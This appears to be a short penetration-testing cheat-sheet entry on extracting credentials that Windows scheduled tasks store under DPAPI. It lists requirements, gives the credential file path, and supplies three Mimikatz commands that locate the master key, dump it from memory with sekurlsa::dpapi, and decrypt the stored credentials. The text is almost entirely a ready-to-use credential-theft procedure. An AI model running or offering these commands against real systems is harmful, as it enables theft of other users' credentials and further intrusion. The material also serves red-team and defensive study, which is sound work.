Requirements

  • Local admin
  • Existing stored scheduled task credentials

Scheduled tasks may store credentials of other users so that it may run a task under that user without having the user logging in. The credentials are stored in C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials encrypted by DPAPI.

To obtain the stored credentials:

  • Use Mimikatz to find the master key used to encrypt the credential: mimikatz dpapi::cred /in:c:\path\to\cred
  • Use mimikatz !sekurlsa::dpapi to dump the decrypted master key.
  • Decrypt credentials using: mimikatz dpapi::cred /in:c\path\to\cred /masterkey:[master-key-hex]